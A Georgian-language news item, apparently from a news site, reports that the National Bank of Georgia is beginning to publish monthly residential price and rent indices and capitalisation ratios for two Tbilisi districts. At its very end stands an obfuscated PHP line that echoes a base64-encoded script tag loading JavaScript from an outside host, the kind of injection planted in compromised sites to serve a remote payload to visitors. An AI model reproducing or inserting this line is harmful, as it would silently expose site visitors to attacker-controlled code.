celsiusi
ავერსი საქკაბელი

 საქართველოს ეროვნული ბანკი საცხოვრებელი უძრავი ქონების ფასისა და ქირის ინდექსების გამოქვეყნებას იწყებს.

საქართველოს ეროვნული ბანკის ცნობით, საქართველოს ეროვნული ბანკი საცხოვრებელი უძრავი ქონების ფასისა და ქირის მონაცემებს, რეგულარული სიხშირით, 2006 წლიდან აგროვებს.

„საცხოვრებელი უძრავი ქონების ფასისა და ქირის ინდექსები ფინანსური სტაბილურობის ერთ-ერთი მნიშვნელოვანი ინდიკატორია, რომელიც საცხოვრებელი უძრავი ქონების საბაზრო ფასების ცვლილებას ასახავს.

საქართველოს ეროვნული ბანკი საცხოვრებელი უძრავი ქონების ფასისა და ქირის მონაცემებს, რეგულარული სიხშირით, 2006 წლიდან აგროვებს. მისი ისტორიული მწკრივის არსებობა შესაძლებლობას მისცემს ბაზრის მონაწილეებს, ანალიტიკოსებს, მკვლევარებს და სხვა დაინტერესებულ პირებს ფლობდნენ ოპერატიულ თემატურ ინფორმაციას. ამასთან, უძრავი ქონების ინდექსებთან ერთად, ეროვნული ბანკი კაპიტალიზაციის მაჩვენებლების გამოქვეყნებასაც იწყებს.

მეთოდოლოგიური თვალსაზრისით, საცხოვრებელი უძრავი ქონების ფასებისა და ქირის ინდექსები ფარავს დედაქალაქის ორ უმსხვილეს ურბანულ სეგმენტს - საბურთალოსა და ვარკეთილს. ინდექსები სწორედ აღნიშნულ სეგმენტებში 1-ოთახიან და 3-ოთახიან ტიპურ ბინებზე შეთავაზების ფასების ღია წყაროებიდან რეგულარული ამოკრეფით, მათი გასაშუალოებითა და შედეგის საბაზისო პერიოდის მიმართ ათვლით მიიღება. კაპიტალიზაციის მაჩვენებელი კი გამოითვლება როგორც მოცემული თვის გაწლიურებული საშუალო ქირის ფარდობა იმავე თვის საშუალო ფასთან.

საცხოვრებელი უძრავი ქონების ფასისა და ქირის ინდექსები, კაპიტალიზაციის მაჩვენებელთან ერთად, ყოველთვიურად გამოქვეყნდება საქართველოს ეროვნული ბანკის ოფიციალურ ვებ-გვერდზე - ინტერაქტიული სტატისტიკის რუბრიკაში.“, - აღნიშნულია ინფორმაციაში.

135
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");